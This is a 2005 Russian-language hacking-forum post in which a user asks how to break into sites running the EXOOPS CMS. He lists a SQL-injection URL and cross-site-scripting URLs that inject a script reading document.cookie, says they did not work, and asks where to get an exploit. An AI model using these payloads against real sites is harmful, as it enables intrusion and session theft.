ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу EXOOPS
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

EXOOPS
  #1  
Старый 24.08.2005, 14:41
Аватар для TNT
TNT
Новичок
Регистрация: 20.08.2005
Сообщений: 2
Провел на форуме:
2276

Репутация: 0
Отправить сообщение для TNT с помощью ICQ
По умолчанию EXOOPS
Я извеняюсь может я залез не в тему, но это единственный раздел который мне кажется ближе к теме. Есть такой движок сайта как EXOOPS. но я не могу н-ти в нем дырку. Все, что я нашел так это только:
http://[target]/modules/newbb/index.php?viewcat='SQL_INJECTION
http://[target]/modules/sections/ind...id=9%2c+9%2c+9

Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:
http://[target]/modules/newbb/viewforum.php?
sortname=p.post_time&sortorder=ASC&
sortdays=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script %
3E&forum=25&refresh=Vai

http://[target]/modules/newbb/index.php?
viewcat=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E

Но запросы он игнорирует. Кстати я слышал, что есть эксплойт для данного движка, но я не смог его найти. Не подскажите где его можно взять.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ